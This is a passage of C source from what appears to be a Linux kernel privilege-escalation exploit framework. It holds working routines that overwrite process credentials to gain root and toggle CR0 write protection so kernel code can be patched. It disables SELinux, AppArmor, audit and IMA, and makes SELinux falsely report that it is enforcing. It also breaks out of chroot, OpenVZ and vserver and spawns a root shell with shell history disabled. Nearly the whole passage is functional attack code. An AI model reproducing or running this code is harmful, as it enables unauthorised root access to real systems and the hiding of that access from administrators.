  867.     int uid; // 0
  868.     int gid; // 0
  869.     int suid; // 0
  870.     int sgid; // 0
  871.     int euid; // 0
  872.     int egid; // 0
  873.     int fsuid; // 0
  874.     int fsgid; // 0
  875.     int securebits; // SECUREBITS_DEFAULT 0x00000000
  876.     unsigned int cap_inheritable[2]; // CAP_INIT_INH_SET {0, 0}
  877.     unsigned int cap_permitted[2]; // CAP_FULL_SET { ~0, ~0 }
  878.     unsigned int cap_effective[2]; // CAP_INIT_EFF_SET { ~(1 << 8), ~0 }
  879.     unsigned int cap_bset[2]; // CAP_INIT_BSET -> CAP_FULL_SET || CAP_INIT_EFF_SET
  880. };
  881.  
  882. static inline unsigned long *pg_to_ptr(unsigned long addr)
  883. {
  884.     return (unsigned long *)(0xffff880000000000UL + (addr & 0x000ffffffffff000UL));
  885. }
  886.  
  887. static inline unsigned long pte_to_kaddr(unsigned long pte)
  888. {
  889.     return 0xffffffff80000000UL + (pte & 0x000ffffffffff000UL);
  890. }
  891.  
  892. #define NUM_RANGES 32
  893.  
  894. static unsigned long valid_ranges[NUM_RANGES][2];
  895.  
  896. /* elito #2 */
  897. static inline void find_kernel_ranges(void)
  898. {
  899.     unsigned long i, z, t;
  900.     unsigned long _cr3;
  901.     unsigned long *kernelpg;
  902.     unsigned long *kernelpte;
  903.     int rangeidx = 0;
  904.     int x = -1;
  905.  
  906.     if (valid_ranges[0][0])
  907.         return;
  908.  
  909.     asm volatile (
  910.     "mov %%cr3, %0"
  911.     : "=r" (_cr3)
  912.     );
  913.  
  914.     kernelpg = pg_to_ptr(pg_to_ptr(pg_to_ptr(_cr3)[511])[510]);
  915.     for (i = 0; i < 511; i++) {
  916.         if ((kernelpg[i] & 1) && x < 0) {
  917.             x = i;
  918.         }
  919.         if (!(kernelpg[i+1] & 1) && x >= 0) {
  920.             break;
  921.         }
  922.     }
  923.     for (z = x; z <= i; z++) {
  924.         // large page
  925.         if ((kernelpg[z] & (1 << 7)) && !valid_ranges[rangeidx][0])
  926.             valid_ranges[rangeidx][0] = pte_to_kaddr(kernelpg[z]);
  927.         else if (!(kernelpg[z] & (1 << 7))) {
  928.             // check 4K pages
  929.             kernelpte = pg_to_ptr(kernelpg[z]);
  930.             for (t = 0; t < 511; t++) {
  931.                 if ((kernelpte[t] & 0x1) && !valid_ranges[rangeidx][0])
  932.                     valid_ranges[rangeidx][0] = pte_to_kaddr(kernelpte[t]);
  933.                 else if (!(kernelpte[t] & 0x1) && !valid_ranges[rangeidx][1]) {
  934.                     valid_ranges[rangeidx][1] = pte_to_kaddr(kernelpg[z]);
  935.                     rangeidx++;
  936.                 }
  937.                 else if (!(kernelpte[t+1] & 0x1) && !valid_ranges[rangeidx][1]) {
  938.                     valid_ranges[rangeidx][1] = pte_to_kaddr(kernelpte[t]) + 0x1000;
  939.                     rangeidx++;
  940.                 }
  941.             }
  942.         }
  943.     }
  944.     if (valid_ranges[rangeidx][0] && !valid_ranges[rangeidx][1]) {
  945.         valid_ranges[rangeidx][1] = pte_to_kaddr(kernelpg[i]) + 0x200000;
  946.     }
  947. }
  948.  
  949. static inline unsigned long find_init_cred(void)
  950. {
  951.     unsigned long len;
  952.     struct cred *tmp;
  953.     int i, x;
  954.  
  955.     find_kernel_ranges();
  956.     if (!valid_ranges[0][0] || !valid_ranges[0][1])
  957.         return 0;
  958.  
  959.     for (x = 0; valid_ranges[x][0]; x++) {
  960.     for (i = 0; i < valid_ranges[x][1] - valid_ranges[x][0] - sizeof(struct cred); i++) {
  961.         tmp = (struct cred *)valid_ranges[x][0];
  962.         if (tmp->usage >= 4 && tmp->uid == 0 && tmp->gid == 0 &&
  963.             tmp->suid == 0 && tmp->sgid == 0 && tmp->euid == 0 &&
  964.             tmp->egid == 0 && tmp->fsuid == 0 && tmp->fsgid == 0 &&
  965.             tmp->securebits == 0 && tmp->cap_inheritable[0] == 0 &&
  966.             tmp->cap_inheritable[1] == 0 && tmp->cap_permitted[0] == ~0 &&
  967.             tmp->cap_permitted[1] == ~0 &&
  968.             (tmp->cap_effective[0] == ~(1 << 8) || tmp->cap_effective[0] == ~0) &&
  969.             tmp->cap_effective[1] == ~0 &&
  970.             (tmp->cap_bset[0] == ~0 || tmp->cap_bset[0] == ~(1 << 8)) &&
  971.             tmp->cap_bset[1] == ~0)
  972.             return (unsigned long)tmp;
  973.     }
  974.     }
  975.  
  976.     return 0UL;
  977. }
  978.  
  979. static void bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club(unsigned long orig_current)
  980. {
  981.     /* cause it's a trillion dollar industry */
  982.     unsigned char *current = (unsigned char *)orig_current;
  983.     struct cred *init_cred_addr, **cred, **real_cred;
  984.     int i;
  985.  
  986.     init_cred_addr = (struct cred *)find_init_cred();
  987.     if (!init_cred_addr)
  988.         return;
  989.  
  990.     /* ok, we couldn't find our UIDs in the task struct
  991.        and we don't have the symbols for the creds
  992.        framework, discover it in a stupidly easy way:
  993.        in task_struct:
  994.        ...stuff...
  995.        const struct cred *real_cred;
  996.        const struct cred *cred;
  997.        struct mutex cred_exec_mutex;
  998.        char comm[16];
  999.        ...stuff...
  1000.  
  1001.        if we were executed from main, then our name is
  1002.        "exploit", otherwise it's "pulseaudio"
  1003.        then we find init_cred through heuristics
  1004.        increment its refcnt appropriately
  1005.        and set up our credentials
  1006.     */
  1007.  
  1008.     for (i = 0; i < 0x1000 - 16; i++) {
  1009.         if ((exp_state.run_from_main == 1 && !memcmp(&current[i], "exploit", strlen("exploit") + 1)) ||
  1010.             (exp_state.run_from_main == 0 && !memcmp(&current[i], "pulseaudio", strlen("pulseaudio") + 1))) {
  1011.             /* now work backwards till we find the two cred pointers
  1012.             */
  1013.             for (i-=sizeof(unsigned long); i > sizeof(unsigned long); i-=sizeof(unsigned long)) {
  1014.                 if (*((unsigned long *)&current[i]) != *((unsigned long *)&current[i-sizeof(unsigned long)]))
  1015.                     continue;
  1016.                  // unlocked
  1017.                 cred_offset = i - sizeof(char *);
  1018.                 real_cred = (struct cred **)&current[i-sizeof(char *)];
  1019.                 cred = (struct cred **)&current[i];
  1020.                 /* found init_cred, so now point our
  1021.                    cred struct to it, and increment usage!
  1022.                 */
  1023.                 *real_cred = *cred = init_cred_addr;
  1024.                 init_cred_addr->usage+=2;
  1025.                 exp_state.got_root = 1;
  1026.                 return;
  1027.             }
  1028.             return;
  1029.         }
  1030.     }
  1031.     return;
  1032. }
  1033.  
  1034. static void give_it_to_me_any_way_you_can(void)
  1035. {
  1036.     unsigned long orig_current;
  1037.  
  1038.     orig_current = get_current_4k();
  1039.     if (orig_current == 0)
  1040.         orig_current = get_current_8k();
  1041.  
  1042.     current_addr = orig_current;
  1043.  
  1044.     if (commit_creds && prepare_kernel_cred) {
  1045.         commit_creds(prepare_kernel_cred(0));
  1046.         exp_state.got_root = 1;
  1047.     } else {
  1048.         unsigned int *current;
  1049.  
  1050.         current = (unsigned int *)orig_current;
  1051.         while (((unsigned long)current < (orig_current + 0x1000 - 17 )) &&
  1052.             (current[0] != our_uid || current[1] != our_uid ||
  1053.              current[2] != our_uid || current[3] != our_uid))
  1054.             current++;
  1055.  
  1056.         if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) {
  1057.             bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club(orig_current);
  1058.             cred_support = 1;
  1059.             return;
  1060.         }
  1061.         exp_state.got_root = 1;
  1062.         /* clear the UIDs and GIDs */
  1063.         memset(current, 0, sizeof(unsigned int) * 8);
  1064.         /* now let's try to elevate our capabilities as well (pre-creds structure)
  1065.            2.4 has next: int ngroups; gid_t groups[NGROUPS]; then caps
  1066.            2.6 has next: struct group_info *group_info; then caps
  1067.            we could actually capget, but lets assume all three are 0
  1068.            in both cases, the capabilities occur before:
  1069.             unsigned keep_capabilities:1;
  1070.             struct user_struct *user;
  1071.            so we'll be fine with clobbering all 0s in between
  1072.           */
  1073.         {
  1074.             int i;
  1075.             int zeroed;
  1076.  
  1077.             current += 8; // skip uids/gids
  1078.             /* skip over any next pointer */
  1079.             current += (sizeof(unsigned long) == sizeof(unsigned int)) ? 1 : 2;
  1080.             for (i = 0; i < 40; i++) {
  1081.                 if (!current[i]) {
  1082.                     zeroed = 1;
  1083.                     current[i] = 0xffffffff;
  1084.                     raised_caps = 1;
  1085.                 /* once we zero a block, stop when we
  1086.                    find something non-zero
  1087.                 */
  1088.                 } else if (zeroed)
  1089.                     break;
  1090.             }
  1091.         }
  1092.     }
  1093.  
  1094.     return;
  1095. }
  1096.  
  1097. unsigned long inline get_cr0(void)
  1098. {
  1099.     unsigned long _cr0;
  1100.  
  1101.     asm volatile (
  1102.     "mov %%cr0, %0"
  1103.     : "=r" (_cr0)
  1104.     );
  1105.  
  1106.     return _cr0;
  1107. }
  1108.  
  1109. void inline set_cr0(unsigned long _cr0)
  1110. {
  1111.     asm volatile (
  1112.     "mov %0, %%cr0"
  1113.     :
  1114.     : "r" (_cr0)
  1115.     );
  1116. }
  1117.  
  1118. int inline turn_off_wp(void)
  1119. {
  1120.     unsigned long _cr0;
  1121.  
  1122.     /* if xen is enabled and we can change ptes then we'll do that */
  1123.     if (can_change_ptes)
  1124.         return 1;
  1125.     /* don't do it if xen is enabled and we can't just
  1126.        write to kernel .text */
  1127.     if (xen_detected && mark_rodata_ro && set_kernel_text_ro)
  1128.         return 0;
  1129.     /* if it's just xen, don't use cr0 or we'll GPF */
  1130.     if (xen_detected)
  1131.         return 1;
  1132.  
  1133.     _cr0 = get_cr0();
  1134.     _cr0 &= ~0x10000;
  1135.     set_cr0(_cr0);
  1136.  
  1137.     return 1;
  1138. }
  1139.  
  1140. void inline turn_on_wp(void)
  1141. {
  1142.     unsigned long _cr0;
  1143.  
  1144.     /* if it's just xen, don't use cr0 or we'll GPF */
  1145.     if (xen_detected)
  1146.         return;
  1147.  
  1148.     _cr0 = get_cr0();
  1149.     _cr0 |= 0x10000;
  1150.     set_cr0(_cr0);
  1151. }
  1152.  
  1153. unsigned long trigger_retaddr;
  1154.  
  1155. unsigned long user_cs;
  1156. unsigned long user_ss;
  1157. unsigned long user_gs;
  1158.  
  1159. static void get_segment_descriptors(void)
  1160. {
  1161. #ifdef __x86_64__
  1162.     asm volatile (
  1163.     "movq %%cs, %0 ;"
  1164.     "movq %%ss, %1 ;"
  1165.     : "=r" (user_cs), "=r" (user_ss)
  1166.     :
  1167.     : "memory"
  1168.     );
  1169. #else
  1170.     asm volatile (
  1171.     "push %%cs ;"
  1172.     "pop %0 ;"
  1173.     "push %%ss ;"
  1174.     "pop %1 ;"
  1175.     "push %%gs ;"
  1176.     "pop %2 ;"
  1177.     : "=r" (user_cs), "=r" (user_ss), "=r" (user_gs)
  1178.     :
  1179.     : "memory"
  1180.     );
  1181. #endif
  1182. }
  1183.  
  1184.  
  1185. /* greets to qaaz */
  1186. static void exit_kernel(void)
  1187. {
  1188. #ifdef __x86_64__
  1189.     asm volatile (
  1190.     "swapgs ;"
  1191.     "movq %0, 0x20(%%rsp) ;"
  1192.     "movq %1, 0x18(%%rsp) ;"
  1193.     "movq %2, 0x10(%%rsp) ;"
  1194.     "movq %3, 0x08(%%rsp) ;"
  1195.     "movq %4, 0x00(%%rsp) ;"
  1196.     "iretq"
  1197.     : : "r" (user_ss), "r" (exit_stack + (1024 * 1024) - 0x80), "i" (USER_EFLAGS),
  1198.     "r" (user_cs), "r" (trigger_retaddr)
  1199.     );
  1200. #else
  1201.     asm volatile (
  1202.     "pushl %0 ;"
  1203.     "pop %%gs ;"
  1204.     "movl %1, 0x10(%%esp) ;"
  1205.     "movl %2, 0x0c(%%esp) ;"
  1206.     "movl %3, 0x08(%%esp) ;"
  1207.     "movl %4, 0x04(%%esp) ;"
  1208.     "movl %5, 0x00(%%esp) ;"
  1209.     "iret"
  1210.     : : "r" (user_gs), "r" (user_ss), "r" (exit_stack + (1024 * 1024) - 0x80), "i" (USER_EFLAGS),
  1211.     "r" (user_cs), "r" (trigger_retaddr)
  1212.     );
  1213. #endif
  1214. }
  1215.  
  1216. static _trigger_the_bug trigger;
  1217. static int main_ret;
  1218.  
  1219. void trigger_get_return(void)
  1220. {
  1221.     trigger_retaddr = (unsigned long)__builtin_return_address(0);
  1222.     main_ret = trigger();
  1223.     if (!main_ret)
  1224.         exit(0);
  1225.     return;
  1226. }
  1227.  
  1228. static void make_range_readwrite(unsigned long start, unsigned long len)
  1229. {
  1230.     unsigned long end;
  1231.  
  1232.     if (!can_change_ptes)
  1233.         return;
  1234.  
  1235.     end = start + len;
  1236.  
  1237.     make_lowmem_page_readwrite(start);
  1238.  
  1239.     // check if the entire range fits in one page
  1240.     if ((start >> 12) != (end >> 12))
  1241.         make_lowmem_page_readwrite(end);
  1242.  
  1243.     return;
  1244. }
  1245. static void make_range_readonly(unsigned long start, unsigned long len)
  1246. {
  1247.     unsigned long end;
  1248.  
  1249.     if (!can_change_ptes)
  1250.         return;
  1251.  
  1252.     end = start + len;
  1253.  
  1254.     make_lowmem_page_readonly(start);
  1255.  
  1256.     // check if the entire range fits in one page
  1257.     if ((start >> 12) != (end >> 12))
  1258.         make_lowmem_page_readonly(end);
  1259.  
  1260.     return;
  1261. }
  1262.  
  1263. static _ring0_cleanup ring0_cleanup;
  1264. static unsigned long get_kallsyms_lookup_name(void);
  1265.  
  1266. static int return_to_process_context;
  1267.  
  1268. static inline int are_interrupts_disabled(void)
  1269. {
  1270.     unsigned long flags;
  1271.  
  1272. #ifdef __x86_64
  1273.     asm volatile(
  1274.     "pushfq\n"
  1275.     "mov (%%rsp), %0\n"
  1276.     "popfq\n"
  1277.     : "=r" (flags)
  1278.     );
  1279. #else
  1280.     asm volatile(
  1281.     "pushf\n"
  1282.     "mov (%%esp), %0\n"
  1283.     "popf\n"
  1284.     : "=r" (flags)
  1285.     );
  1286. #endif
  1287.  
  1288.     return !(flags & (1 << 9));
  1289. }
  1290.  
  1291. static inline void chroot_breakout(void)
  1292. {
  1293.     int x, z;
  1294.     unsigned long *fsptr;
  1295.     unsigned long *initfsptr;
  1296.  
  1297.     if (!init_task || !init_fs || !set_fs_root || !set_fs_pwd || !current_addr || !virt_addr_valid)
  1298.         return;
  1299.  
  1300.     initfsptr = (unsigned long *)init_fs;
  1301.  
  1302.     for (x = 0; x < 0x1000/sizeof(unsigned long); x++) {
  1303.         if (init_task[x] != init_fs)
  1304.             continue;
  1305.         fs_offset = x * sizeof(unsigned long);
  1306.         fsptr = (unsigned long *)*(unsigned long *)(current_addr + fs_offset);
  1307.         if (fsptr == NULL)
  1308.             continue;
  1309.         // we replace root and pwd too, so adjust reference counters
  1310.         // accordingly
  1311.         for (z = 0; z < 6; z++) {
  1312.             /* lemony snicket's a series of unfortunate ints */
  1313. #ifdef __x86_64__
  1314.             if (fsptr[z] == 0xffffffff00000000UL)
  1315.                 continue;
  1316. #endif
  1317.             if (virt_addr_valid(fsptr[z]) && virt_addr_valid(fsptr[z+1]) &&
  1318.                 virt_addr_valid(fsptr[z+2]) && virt_addr_valid(fsptr[z+3])) {
  1319.                 set_fs_root((unsigned long)fsptr, (unsigned long)&initfsptr[z]);
  1320.                 set_fs_pwd((unsigned long)fsptr, (unsigned long)&initfsptr[z+2]);
  1321.                 return;
  1322.             }
  1323.         }
  1324.         return;
  1325.     }
  1326. }
  1327.  
  1328. struct vserver_struct {
  1329.     unsigned long val1;
  1330.     unsigned long val2;
  1331.     unsigned int val3;
  1332.     unsigned int val4;
  1333. };
  1334.  
  1335. static inline void vserver_breakout(void)
  1336. {
  1337.     char zeroes[32] = {};
  1338.     int vserver_base;
  1339.     unsigned int *vinfo, *ninfo;
  1340.     unsigned long *curr;
  1341.     struct vserver_struct *vserv;
  1342.     int x;
  1343.  
  1344.     if (!init_task || !current_addr || !virt_addr_valid || !vc_sock_stat)
  1345.         return;
  1346.  
  1347.     for (x = 0; x < 0x1000/sizeof(unsigned long); x++) {
  1348.         vserver_base = x * sizeof(unsigned long);
  1349.         vserv = (struct vserver_struct *)(current_addr + vserver_base);
  1350. #ifdef __x86_64__
  1351.         if (!memcmp(&init_task[x], &zeroes, 32) &&
  1352.             virt_addr_valid(vserv->val1) && virt_addr_valid(vserv->val2) &&
  1353.             vserv->val3 && vserv->val4) {
  1354.             vinfo = (unsigned int *)vserv->val1;
  1355.             ninfo = (unsigned int *)vserv->val2;
  1356.             if (vinfo[4] == vserv->val3 &&
  1357.                 ninfo[4] == vserv->val4) {
  1358.                 vserver_offset = vserver_base;
  1359.                 memset((void *)(current_addr + vserver_base), 0, sizeof(struct vserver_struct));
  1360.                 break;
  1361.             }
  1362.         }
  1363. #else
  1364.         /* currently broken */
  1365.         break;
  1366.         if (!memcmp(&init_task[x], &zeroes, 16) &&
  1367.             virt_addr_valid(vserv->val1) && virt_addr_valid(vserv->val2) &&
  1368.             vserv->val3 && vserv->val4) {
  1369.             vinfo = (unsigned int *)vserv->val1;
  1370.             ninfo = (unsigned int *)vserv->val2;
  1371.             if (vinfo[2] == vserv->val3 &&
  1372.                 ninfo[2] == vserv->val4) {
  1373.                 has_vserver = 1;
  1374.                 vserver_offset = vserver_base;
  1375.                 memset((void *)(current_addr + vserver_base), 0, sizeof(struct vserver_struct));
  1376.                 break;
  1377.             }
  1378.         }
  1379. #endif
  1380.     }
  1381. }
  1382.  
  1383. static int __attribute__((regparm(3))) own_the_kernel(unsigned long a)
  1384. {
  1385.     _kallsyms_lookup_name lookup;
  1386.  
  1387.     if (return_to_process_context == 1 && ptmx_fops && aio_read_offset) {
  1388.         return_to_process_context = 2;
  1389.         ptmx_fops[aio_read_offset] = 0;
  1390.         goto resume_own;
  1391.     }
  1392.  
  1393.     if (exp_state.got_ring0 == 1) {
  1394.         /* we were already executed, just do nothing this time */
  1395.         return -1;
  1396.     }
  1397.  
  1398.     exp_state.got_ring0 = 1;
  1399.  
  1400.     if (ring0_cleanup)
  1401.         ring0_cleanup();
  1402.  
  1403.     exp_state.kallsyms_lookup_name = lookup = (_kallsyms_lookup_name)get_kallsyms_lookup_name();
  1404.  
  1405.     if (lookup) {
  1406.         set_fs_root = (_set_fs_root)lookup("set_fs_root");
  1407.         set_fs_pwd = (_set_fs_pwd)lookup("set_fs_pwd");
  1408.         virt_addr_valid = (_virt_addr_valid)lookup("__virt_addr_valid");
  1409.         vc_sock_stat = (unsigned long)lookup("vc_sock_stat");
  1410.         prepare_ve0_process = (_prepare_ve0_process)lookup("prepare_ve0_process");
  1411.         init_task = (unsigned long *)lookup("init_task");
  1412.         init_fs = (unsigned long)lookup("init_fs");
  1413.         default_exec_domain = (unsigned long)lookup("default_exec_domain");
  1414.         bad_file_ops = (unsigned long *)lookup("bad_file_ops");
  1415.         bad_file_aio_read = (unsigned long)lookup("bad_file_aio_read");
  1416.         ima_audit = (int *)lookup("ima_audit");
  1417.         ima_file_mmap = (unsigned char *)lookup("ima_file_mmap");
  1418.         ima_bprm_check = (unsigned char *)lookup("ima_bprm_check");
  1419.         ima_path_check = (unsigned char *)lookup("ima_path_check");
  1420.         ima_file_check = (unsigned char *)lookup("ima_file_check");
  1421.         selinux_enforcing = (int *)lookup("selinux_enforcing");
  1422.         selinux_enabled = (int *)lookup("selinux_enabled");
  1423.         apparmor_enabled = (int *)lookup("apparmor_enabled");
  1424.         apparmor_complain = (int *)lookup("apparmor_complain");
  1425.         apparmor_audit = (int *)lookup("apparmor_audit");
  1426.         apparmor_logsyscall = (int *)lookup("apparmor_logsyscall");
  1427.         security_ops = (unsigned long *)lookup("security_ops");
  1428.         default_security_ops = lookup("default_security_ops");
  1429.         sel_read_enforce = lookup("sel_read_enforce");
  1430.         audit_enabled = (int *)lookup("audit_enabled");
  1431.         commit_creds = (_commit_creds)lookup("commit_creds");
  1432.         prepare_kernel_cred = (_prepare_kernel_cred)lookup("prepare_kernel_cred");
  1433.         xen_start_info = (unsigned long *)lookup("xen_start_info");
  1434.         mark_rodata_ro = lookup("mark_rodata_ro");
  1435.         set_kernel_text_ro = lookup("set_kernel_text_ro");
  1436.         make_lowmem_page_readonly = (_make_lowmem_page_readonly)lookup("make_lowmem_page_readonly");
  1437.         make_lowmem_page_readwrite = (_make_lowmem_page_readwrite)lookup("make_lowmem_page_readwrite");
  1438.         ptmx_fops = (unsigned long *)lookup("ptmx_fops");
  1439.     }
  1440.  
  1441.     if (bad_file_ops && bad_file_aio_read) {
  1442.         int t;
  1443.         for (t = 0; t < 30; t++) {
  1444.             if (bad_file_ops[t] == bad_file_aio_read)
  1445.                 aio_read_offset = t;
  1446.         }
  1447.     }
  1448.  
  1449.     if (are_interrupts_disabled() && ptmx_fops && aio_read_offset && !ptmx_fops[aio_read_offset]) {
  1450.         ptmx_fops[aio_read_offset] = (unsigned long)&own_the_kernel;
  1451.         return_to_process_context = 1;
  1452.         exit_kernel();
  1453.     }
  1454.  
  1455. resume_own:
  1456.  
  1457.     if (xen_start_info && *xen_start_info)
  1458.         xen_detected = 1;
  1459.  
  1460.     if (xen_detected && mark_rodata_ro && set_kernel_text_ro && make_lowmem_page_readonly && make_lowmem_page_readwrite)
  1461.         can_change_ptes = 1;
  1462.  
  1463.     if (audit_enabled)
  1464.         *audit_enabled = 0;
  1465.  
  1466.     if (ima_audit)
  1467.         *ima_audit = 0;
  1468.  
  1469.     // disable apparmor
  1470.     if (apparmor_enabled && *apparmor_enabled) {
  1471.         what_we_do |= DISABLED_APPARMOR;
  1472.             *apparmor_enabled = 0;
  1473.         if (apparmor_audit)
  1474.             *apparmor_audit = 0;
  1475.         if (apparmor_logsyscall)
  1476.             *apparmor_logsyscall = 0;
  1477.         if (apparmor_complain)
  1478.             *apparmor_complain = 0;
  1479.     }
  1480.  
  1481.     // disable SELinux
  1482.     if (selinux_enforcing && *selinux_enforcing) {
  1483.         what_we_do |= DISABLED_SELINUX;
  1484.         *selinux_enforcing = 0;
  1485.     }
  1486.  
  1487.     if (!selinux_enabled || (selinux_enabled && *selinux_enabled == 0)) {
  1488.         // trash LSM
  1489.         if (default_security_ops && security_ops) {
  1490.             /* only list it as LSM if we're disabling
  1491.                something other than apparmor */
  1492.             if (*security_ops != default_security_ops)
  1493.                 what_we_do |= DISABLED_LSM;
  1494.             *security_ops = default_security_ops;
  1495.         }
  1496.     }
  1497.  
  1498.     /* TPM this, dedicated to rcvalle, redpig, and the powerglove
  1499.        NOW you're playing with power!
  1500.  
  1501.        IMA only hashes kernel modules loaded or things run/mmap'd executable
  1502.        as root.  This of course doesn't include our exploit.  So let's
  1503.        just stop appending to the TPM'd hash list all together.
  1504.  
  1505.        Of course, clever minds could think of something better to do here with
  1506.        this code, or re-enable it once they were done executing code as root
  1507.     */
  1508.  
  1509.     if (ima_bprm_check && ima_file_mmap && (ima_path_check || ima_file_check)) {
  1510.         if (turn_off_wp()) {
  1511.             if (memcmp(ima_bprm_check, "\x31\xc0\xc3", 3)) {
  1512.                 /* xor eax, eax / retn */
  1513.                 make_range_readwrite((unsigned long)ima_bprm_check, 3);
  1514.                 ima_bprm_check[0] = '\x31';
  1515.                 ima_bprm_check[1] = '\xc0';
  1516.                 ima_bprm_check[2] = '\xc3';
  1517.                 make_range_readonly((unsigned long)ima_bprm_check, 3);
  1518.                 what_we_do |= DISABLED_IMA;
  1519.             }
  1520.             if (memcmp(ima_file_mmap, "\x31\xc0\xc3", 3)) {
  1521.                 /* xor eax, eax / retn */
  1522.                 make_range_readwrite((unsigned long)ima_file_mmap, 3);
  1523.                 ima_file_mmap[0] = '\x31';
  1524.                 ima_file_mmap[1] = '\xc0';
  1525.                 ima_file_mmap[2] = '\xc3';
  1526.                 make_range_readonly((unsigned long)ima_file_mmap, 3);
  1527.                 what_we_do |= DISABLED_IMA;
  1528.             }
  1529.             if (ima_path_check && memcmp(ima_path_check, "\x31\xc0\xc3", 3)) {
  1530.                 /* xor eax, eax / retn */
  1531.                 make_range_readwrite((unsigned long)ima_path_check, 3);
  1532.                 ima_path_check[0] = '\x31';
  1533.                 ima_path_check[1] = '\xc0';
  1534.                 ima_path_check[2] = '\xc3';
  1535.                 make_range_readonly((unsigned long)ima_path_check, 3);
  1536.                 what_we_do |= DISABLED_IMA;
  1537.             }
  1538.             if (ima_file_check && memcmp(ima_file_check, "\x31\xc0\xc3", 3)) {
  1539.                 /* xor eax, eax / retn */
  1540.                 make_range_readwrite((unsigned long)ima_file_check, 3);
  1541.                 ima_file_check[0] = '\x31';
  1542.                 ima_file_check[1] = '\xc0';
  1543.                 ima_file_check[2] = '\xc3';
  1544.                 make_range_readonly((unsigned long)ima_file_check, 3);
  1545.                 what_we_do |= DISABLED_IMA;
  1546.             }
  1547.             turn_on_wp();
  1548.         }
  1549.     }
  1550.  
  1551.     /* if we just set SELinux into permissive mode,
  1552.        make the idiots think selinux is enforcing
  1553.     */
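    /* patch sel_read_enforce() so reads of /selinux/enforce always report "1"; along the way,
       if the selinux_enforcing symbol was not available, recover its address from the patched
       instruction's memory operand and zero it to actually disable enforcement */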
  1554.     if (sel_read_enforce) {
  1555.         unsigned char *p;
  1556.         int can_write;
  1557.         can_write = turn_off_wp();
  1558.  
  1559.         if (sizeof(unsigned int) != sizeof(unsigned long)) {
  1560.             /* 64bit version, look for the mov ecx, [rip+off]
  1561.                and replace with mov ecx, 1
  1562.             */
  1563.             for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {
  1564.                 if (p[0] == 0x8b && p[1] == 0x0d) {
  1565.                     if (!selinux_enforcing) {
  1566.                         // determine address of rip+off, as it's our selinux_enforcing
  1567.                         sel_enforce_ptr = (int *)((char *)p + 6 + *(int *)&p[2]);
  1568.                         if (*sel_enforce_ptr) {
  1569.                             *sel_enforce_ptr = 0;
  1570.                             what_we_do |= DISABLED_SELINUX;
  1571.                         }
  1572.                     }
  1573.                     if (can_write && (what_we_do & DISABLED_SELINUX)) {
  1574.                         make_range_readwrite((unsigned long)p, 6);
  1575.                         p[0] = '\xb9';
  1576.                         p[5] = '\x90';
  1577.                         *(unsigned int *)&p[1] = 1;
  1578.                         make_range_readonly((unsigned long)p, 6);
  1579.                     }
  1580.                 }
  1581.             }
  1582.         } else {
  1583.             /* 32bit, replace push [selinux_enforcing] with push 1 */
  1584.             for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {
  1585.                 if (p[0] == 0xff && p[1] == 0x35 && *(unsigned int *)&p[2] > 0xc0000000) {
  1586.                     // while we're at it, disable
  1587.                     // SELinux without having a
  1588.                     // symbol for selinux_enforcing ;)
  1589.                     if (!selinux_enforcing) {
  1590.                         sel_enforce_ptr = *(int **)&p[2];
  1591.                         if (*sel_enforce_ptr) {
  1592.                             *sel_enforce_ptr = 0;
  1593.                             what_we_do |= DISABLED_SELINUX;
  1594.                         }
  1595.                     }
  1596.                     if (can_write && (what_we_do & DISABLED_SELINUX)) {
  1597.                         make_range_readwrite((unsigned long)p, 6);
  1598.                         p[0] = '\x68';
  1599.                         p[5] = '\x90';
  1600.                         *(unsigned int *)&p[1] = 1;
  1601.                         make_range_readonly((unsigned long)p, 6);
  1602.                     }
  1603.                 } else if (p[0] == 0xa1 &&
  1604.                     *(unsigned int *)&p[1] > 0xc0000000) {
  1605.                     /* old 2.6 kernels are compiled differently */
  1606.                     if (!selinux_enforcing) {
  1607.                         sel_enforce_ptr = *(int **)&p[1];
  1608.                         if (*sel_enforce_ptr) {
  1609.                             *sel_enforce_ptr = 0;
  1610.                             what_we_do |= DISABLED_SELINUX;
  1611.                         }
  1612.                     }
  1613.                     if (can_write && (what_we_do & DISABLED_SELINUX)) {
  1614.                         make_range_readwrite((unsigned long)p, 5);
  1615.                         p[0] = '\xb8';
  1616.                         *(unsigned int *)&p[1] = 1;
  1617.                         make_range_readonly((unsigned long)p, 5);
  1618.                     }
  1619.                 }
  1620.             }
  1621.         }
  1622.  
  1623.         turn_on_wp();
  1624.     }
  1625.  
  1626.     // push it real good
  1627.     give_it_to_me_any_way_you_can();
  1628.  
  1629.     // break out of chroot, mnt namespace
  1630.     chroot_breakout();
  1631.  
  1632.     // break out of OpenVZ
  1633.     if (prepare_ve0_process && current_addr) {
  1634.         prepare_ve0_process(current_addr);
  1635.     }
  1636.  
  1637.     // break out of vserver
  1638.     // find xid/vx_info/nid/nx_info -- they'll be zero in init_task but set in our confined task
  1639.     // once found, zero it out
  1640.     // can be made more reliable by verifying struct with xid info obtained from /proc
  1641.     vserver_breakout();
  1642.  
  1643.     return -1;
  1644. }
  1645.  
  1646. /* we do this so that we can swap the stack out later, if needed, upon returning to userland
  1647.    without losing any "local" variables, so the perf_counter exploit can have the same
  1648.    pretty printouts as all the others ;)
  1649.    note that -fomit-frame-pointer is required to pull this hack off
  1650. */
  1651.  
  1652. static unsigned char *mem = NULL;
  1653. static _prepare_for_exploit prepare;
  1654. static _get_exploit_state_ptr get_exploit_state_ptr;
  1655. static _post_exploit post;
  1656. static int requires_null_page;
  1657. static int exp_idx;
  1658.  
  1659. int cwd_dirfd;
  1660.  
  1661. /* more sgrakkyu/twiz love */
  1662. static void exec_rootshell(void)
  1663. {
  1664.     char buf[PATH_MAX+1];
  1665.     struct stat st;
  1666.     int ret;
  1667.  
  1668.     char *argv[] = { "/bin/sh", "-i", NULL };
  1669.     char *argvbash[] = { "/bin/sh", "--norc", "--noprofile", NULL };
  1670.     char *envp[] = { "TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null",
  1671.             "history=/dev/null",
  1672.             "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
  1673.             NULL };
  1674.     char *envpbash[] = { "TERM=linux", "PS1=1",
  1675.             "BASH_HISTORY=/dev/null", "HISTORY=/dev/null",
  1676.             "history=/dev/null",
